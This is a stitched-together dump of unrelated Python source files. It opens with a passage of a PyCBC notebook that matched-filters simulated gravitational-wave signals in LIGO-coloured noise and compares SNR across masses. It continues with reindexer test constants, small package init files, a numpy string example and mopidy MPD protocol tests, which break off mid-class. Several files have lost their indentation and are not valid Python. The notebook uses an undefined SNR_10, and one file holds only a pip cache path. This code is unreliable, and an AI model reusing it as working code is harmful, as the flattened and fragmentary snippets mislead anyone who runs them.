times = numpy.arange(len(data)) / float(sample_rate)
from pycbc.waveform import get_td_waveform
apx = 'IMRPhenomD'
hp1, _ = get_td_waveform(approximant=apx,
mass1=15,
mass2=15,
delta_t=1.0/sample_rate,
f_lower=25)
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# In[171]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
# In[172]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
# SNR = |peak of the cross-correlation| / std of the cross-correlation time series (not the histogram peak)
SNR_15 = np.abs(cross_correlation).max()/std
print('The SNR_15 value is',SNR_15)
#print(bin_nmax)
# ### For mass1=mass2=20
# In[173]:
import numpy
import pylab
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
from pycbc.waveform import get_td_waveform
apx = 'IMRPhenomD'
hp1, _ = get_td_waveform(approximant=apx,
mass1=20,
mass2=20,
delta_t=1.0/sample_rate,
f_lower=25)
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# In[174]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
# In[175]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
# SNR = |peak of the cross-correlation| / std of the cross-correlation time series (not the histogram peak)
SNR_20 = np.abs(cross_correlation).max()/std
print('The SNR_20 value is',SNR_20)
#print(bin_nmax)
# ### For mass1=mass2=25
# In[176]:
import numpy
import pylab
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
from pycbc.waveform import get_td_waveform
apx = 'IMRPhenomD'
hp1, _ = get_td_waveform(approximant=apx,
mass1=25,
mass2=25,
delta_t=1.0/sample_rate,
f_lower=25)
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# In[177]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
# In[178]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
# SNR = |peak of the cross-correlation| / std of the cross-correlation time series (not the histogram peak)
SNR_25 = np.abs(cross_correlation).max()/std
print('The SNR_25 value is',SNR_25)
#print(bin_nmax)
# In[184]:
SNR=[SNR_10,SNR_15,SNR_20,SNR_25]
Mass=[10,15,20,25]
fig, ax = plt.subplots(figsize =(10, 7))
ax.plot(Mass,SNR,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_xlabel('Mass',fontsize=15)
ax.set_ylabel('SNR',fontsize=15)
#ax.set_yscale('log')
#ax.set_xscale('log')
plt.show()
# ### Optimizing a matched-filter
#
# That's all a matched filter is: a cross-correlation of the data with a template waveform, performed as a function of time. This cross-correlation walking through the data is a convolution operation. Convolution operations are more optimally performed in the frequency domain, which becomes an `O(N ln N)` operation, as opposed to the `O(N^2)` operation shown here. You can also conveniently vary the phase of the signal in the frequency domain, as we will illustrate in the next tutorial. PyCBC implements a frequency-domain matched-filtering engine, which is much faster than the code we've shown here; a minimal sketch of the idea follows. Let's move to the next tutorial now, where we will demonstrate its use on real data.
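# In[ ]:
# A minimal sketch of that speed-up (an illustration only, not PyCBC's matched-filtering engine):
# the O(N^2) loop above can be replaced by an FFT-based correlation. This assumes the whitened
# arrays `datan` and `hp1n` and the loop result `cross_correlation` from the cells above.
from scipy.signal import fftconvolve
# correlating with the template is equivalent to convolving with its time-reverse
cross_correlation_fft = fftconvolve(datan, hp1n[::-1], mode='valid')
# the FFT result matches the loop result up to floating-point error (should print True)
print(numpy.allclose(cross_correlation_fft[:len(cross_correlation)], cross_correlation, rtol=1e-4, atol=1e-6))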
# File: pyreindexer/tests/test_data/constants.py (Restream/reindexer-py, Apache-2.0)
# Index definition used to create the test namespace's primary-key index.
index_definition = {
    "name": "id",
    "field_type": "int",
    "index_type": "hash",
    "is_pk": True,
    "is_array": False,
    "is_dense": False,
    "is_sparse": False,
    "collate_mode": "none",
    "sort_order_letters": "",
    "expire_after": 0,
    "config": {},
    "json_paths": ["id"]
}

# The same index after an update: the field type widens to int64 and the
# JSON path is renamed.
updated_index_definition = {
    "name": "id",
    "field_type": "int64",
    "index_type": "hash",
    "is_pk": True,
    "is_array": False,
    "is_dense": False,
    "is_sparse": False,
    "collate_mode": "none",
    "sort_order_letters": "",
    "expire_after": 0,
    "config": {},
    "json_paths": ["id_new"]
}

# System namespaces that reindexer always exposes.
special_namespaces = [{"name": "#namespaces"},
                      {"name": "#memstats"},
                      {"name": "#perfstats"},
                      {"name": "#config"},
                      {"name": "#queriesperfstats"},
                      {"name": "#activitystats"},
                      {"name": "#clientsstats"}]

# In cluster mode one extra system namespace appears.
special_namespaces_cluster = [{"name": "#namespaces"},
                              {"name": "#memstats"},
                              {"name": "#perfstats"},
                              {"name": "#config"},
                              {"name": "#queriesperfstats"},
                              {"name": "#activitystats"},
                              {"name": "#clientsstats"},
                              {"name": "#replicationstats"}]

# A minimal item to insert during tests.
item_definition = {'id': 100, 'val': "testval"}
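
# For context, a minimal sketch of how these constants might be exercised with
# pyreindexer. The connection string, namespace name, and the exact call names
# are assumptions based on the library's documented RxConnector API, not taken
# from this test suite:
from pyreindexer import RxConnector

db = RxConnector('builtin:///tmp/reindexer_test')   # assumed local storage path
db.namespace_open('items')
db.index_add('items', index_definition)             # create the 'id' hash index
db.item_insert('items', item_definition)            # insert the sample item
db.index_update('items', updated_index_definition)  # widen the index to int64
db.close()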
# File: workbox/workbox/websetup/schema.py (pr3sto/workbox, MIT)
# -*- coding: utf-8 -*-
"""Setup the workbox application"""
from __future__ import print_function
def setup_schema(command, conf, vars):
"""Place any commands to setup workbox here"""
pass
# File: scorers/__init__.py (cipher982/birb-watch, Apache-2.0)
# Expose both YOLOv5 scorer backends (PyTorch and ONNX) at package level.
from .yolo_v5_torch import YOLOv5Torch
from .yolo_v5_onnx import YOLOv5ONNX
# File: numpy/stringOperations/numpyFunctionIsNumeric.py (slowy07/pythonApps, MIT)
# numpy.char.isnumeric() returns True only when every character of the
# string is numeric; it does not count or search for substrings.
import numpy as np

# No digits at all -> False
print(np.char.isnumeric('arfyslowy'))
# Contains a digit, but not *all* characters are numeric -> False
print(np.char.isnumeric('kloter2surga'))
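# A quick check of the all-numeric case, added here for illustration (not
# part of the original snippet):
print(np.char.isnumeric('2022'))  # True: every character is a digit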
# File: venv/lib/python3.8/site-packages/pexpect/utils.py (Retraces/UkraineBot, MIT)
# (The checked-in file is a pip cache symlink target, not Python source:)
/home/runner/.cache/pip/pool/d6/32/21/cd4ede06f637a5b5b72d9a09842394d8a5aa82dcb91e043a541608a795
# File: spikeextractors/extractors/nixioextractors/__init__.py (zekearneodo/spikeextractors, MIT)
from .nixioextractors import NIXIORecordingExtractor, NIXIOSortingExtractor
# File: zenbot/logging/__init__.py (Dmunch04/ZenBot, MIT)
from .console_logger import ConsoleLogger
from .file_logger import FileLogger
from .logger import Logger
from .logmanager import LogManager
# File: tests/traversal/conftest.py (spreecode/python-spree-rest, MIT)
import pytest
from .api_structure import APIRoot

# Module-scoped fixture: one APIRoot instance is shared by all tests in a module.
@pytest.fixture(scope='module')
def api_root():
    return APIRoot(parent=None, ref='')
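
# A hypothetical test using the fixture, shown for illustration: pytest
# injects the fixture by matching the argument name. The `parent` attribute
# checked here is an assumption about APIRoot, which is defined elsewhere.
def test_api_root_has_no_parent(api_root):
    assert api_root.parent is None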
# File: tests/frontends/mpd/protocol/music_db_test.py (swinton/mopidy, Apache-2.0)
from tests.frontends.mpd import protocol
class MusicDatabaseHandlerTest(protocol.BaseTestCase):
def test_count(self):
self.sendRequest(u'count "tag" "needle"')
self.assertInResponse(u'songs: 0')
self.assertInResponse(u'playtime: 0')
self.assertInResponse(u'OK')
def test_findadd(self):
self.sendRequest(u'findadd "album" "what"')
self.assertInResponse(u'OK')
def test_listall(self):
self.sendRequest(u'listall "file:///dev/urandom"')
self.assertEqualResponse(u'ACK [0@0] {} Not implemented')
def test_listallinfo(self):
self.sendRequest(u'listallinfo "file:///dev/urandom"')
self.assertEqualResponse(u'ACK [0@0] {} Not implemented')
def test_lsinfo_without_path_returns_same_as_listplaylists(self):
lsinfo_response = self.sendRequest(u'lsinfo')
listplaylists_response = self.sendRequest(u'listplaylists')
self.assertEqual(lsinfo_response, listplaylists_response)
def test_lsinfo_with_empty_path_returns_same_as_listplaylists(self):
lsinfo_response = self.sendRequest(u'lsinfo ""')
listplaylists_response = self.sendRequest(u'listplaylists')
self.assertEqual(lsinfo_response, listplaylists_response)
def test_lsinfo_for_root_returns_same_as_listplaylists(self):
lsinfo_response = self.sendRequest(u'lsinfo "/"')
listplaylists_response = self.sendRequest(u'listplaylists')
self.assertEqual(lsinfo_response, listplaylists_response)
def test_update_without_uri(self):
self.sendRequest(u'update')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
def test_update_with_uri(self):
self.sendRequest(u'update "file:///dev/urandom"')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
def test_rescan_without_uri(self):
self.sendRequest(u'rescan')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
def test_rescan_with_uri(self):
self.sendRequest(u'rescan "file:///dev/urandom"')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
class MusicDatabaseFindTest(protocol.BaseTestCase):
def test_find_album(self):
self.sendRequest(u'find "album" "what"')
self.assertInResponse(u'OK')
def test_find_album_without_quotes(self):
self.sendRequest(u'find album "what"')
self.assertInResponse(u'OK')
def test_find_artist(self):
self.sendRequest(u'find "artist" "what"')
self.assertInResponse(u'OK')
def test_find_artist_without_quotes(self):
self.sendRequest(u'find artist "what"')
self.assertInResponse(u'OK')
def test_find_title(self):
self.sendRequest(u'find "title" "what"')
self.assertInResponse(u'OK')
def test_find_title_without_quotes(self):
self.sendRequest(u'find title "what"')
self.assertInResponse(u'OK')
def test_find_date(self):
self.sendRequest(u'find "date" "2002-01-01"')
self.assertInResponse(u'OK')
def test_find_date_without_quotes(self):
self.sendRequest(u'find date "2002-01-01"')
self.assertInResponse(u'OK')
def test_find_date_with_capital_d_and_incomplete_date(self):
self.sendRequest(u'find Date "2005"')
self.assertInResponse(u'OK')
def test_find_else_should_fail(self):
self.sendRequest(u'find "somethingelse" "what"')
self.assertEqualResponse(u'ACK [2@0] {find} incorrect arguments')
def test_find_album_and_artist(self):
self.sendRequest(u'find album "album_what" artist "artist_what"')
self.assertInResponse(u'OK')
class MusicDatabaseListTest(protocol.BaseTestCase):
def test_list_foo_returns_ack(self):
self.sendRequest(u'list "foo"')
self.assertEqualResponse(u'ACK [2@0] {list} incorrect arguments')
### Artist
def test_list_artist_with_quotes(self):
self.sendRequest(u'list "artist"')
self.assertInResponse(u'OK')
def test_list_artist_without_quotes(self):
self.sendRequest(u'list artist')
self.assertInResponse(u'OK')
def test_list_artist_without_quotes_and_capitalized(self):
self.sendRequest(u'list Artist')
self.assertInResponse(u'OK')
def test_list_artist_with_query_of_one_token(self):
self.sendRequest(u'list "artist" "anartist"')
self.assertEqualResponse(
u'ACK [2@0] {list} should be "Album" for 3 arguments')
def test_list_artist_with_unknown_field_in_query_returns_ack(self):
self.sendRequest(u'list "artist" "foo" "bar"')
self.assertEqualResponse(u'ACK [2@0] {list} not able to parse args')
def test_list_artist_by_artist(self):
self.sendRequest(u'list "artist" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_artist_by_album(self):
self.sendRequest(u'list "artist" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_artist_by_full_date(self):
self.sendRequest(u'list "artist" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_artist_by_year(self):
self.sendRequest(u'list "artist" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_artist_by_genre(self):
self.sendRequest(u'list "artist" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_artist_by_artist_and_album(self):
self.sendRequest(
u'list "artist" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
### Album
def test_list_album_with_quotes(self):
self.sendRequest(u'list "album"')
self.assertInResponse(u'OK')
def test_list_album_without_quotes(self):
self.sendRequest(u'list album')
self.assertInResponse(u'OK')
def test_list_album_without_quotes_and_capitalized(self):
self.sendRequest(u'list Album')
self.assertInResponse(u'OK')
def test_list_album_with_artist_name(self):
self.sendRequest(u'list "album" "anartist"')
self.assertInResponse(u'OK')
def test_list_album_by_artist(self):
self.sendRequest(u'list "album" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_album_by_album(self):
self.sendRequest(u'list "album" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_album_by_full_date(self):
self.sendRequest(u'list "album" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_album_by_year(self):
self.sendRequest(u'list "album" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_album_by_genre(self):
self.sendRequest(u'list "album" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_album_by_artist_and_album(self):
self.sendRequest(
u'list "album" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
### Date
def test_list_date_with_quotes(self):
self.sendRequest(u'list "date"')
self.assertInResponse(u'OK')
def test_list_date_without_quotes(self):
self.sendRequest(u'list date')
self.assertInResponse(u'OK')
def test_list_date_without_quotes_and_capitalized(self):
self.sendRequest(u'list Date')
self.assertInResponse(u'OK')
def test_list_date_with_query_of_one_token(self):
self.sendRequest(u'list "date" "anartist"')
self.assertEqualResponse(
u'ACK [2@0] {list} should be "Album" for 3 arguments')
def test_list_date_by_artist(self):
self.sendRequest(u'list "date" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_date_by_album(self):
self.sendRequest(u'list "date" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_date_by_full_date(self):
self.sendRequest(u'list "date" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_date_by_year(self):
self.sendRequest(u'list "date" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_date_by_genre(self):
self.sendRequest(u'list "date" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_date_by_artist_and_album(self):
self.sendRequest(u'list "date" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
### Genre
def test_list_genre_with_quotes(self):
self.sendRequest(u'list "genre"')
self.assertInResponse(u'OK')
def test_list_genre_without_quotes(self):
self.sendRequest(u'list genre')
self.assertInResponse(u'OK')
def test_list_genre_without_quotes_and_capitalized(self):
self.sendRequest(u'list Genre')
self.assertInResponse(u'OK')
def test_list_genre_with_query_of_one_token(self):
self.sendRequest(u'list "genre" "anartist"')
self.assertEqualResponse(
u'ACK [2@0] {list} should be "Album" for 3 arguments')
def test_list_genre_by_artist(self):
self.sendRequest(u'list "genre" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_genre_by_album(self):
self.sendRequest(u'list "genre" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_genre_by_full_date(self):
self.sendRequest(u'list "genre" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_genre_by_year(self):
self.sendRequest(u'list "genre" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_genre_by_genre(self):
self.sendRequest(u'list "genre" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_genre_by_artist_and_album(self):
self.sendRequest(
u'list "genre" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
class MusicDatabaseSearchTest(protocol.BaseTestCase):
def test_search_album(self):
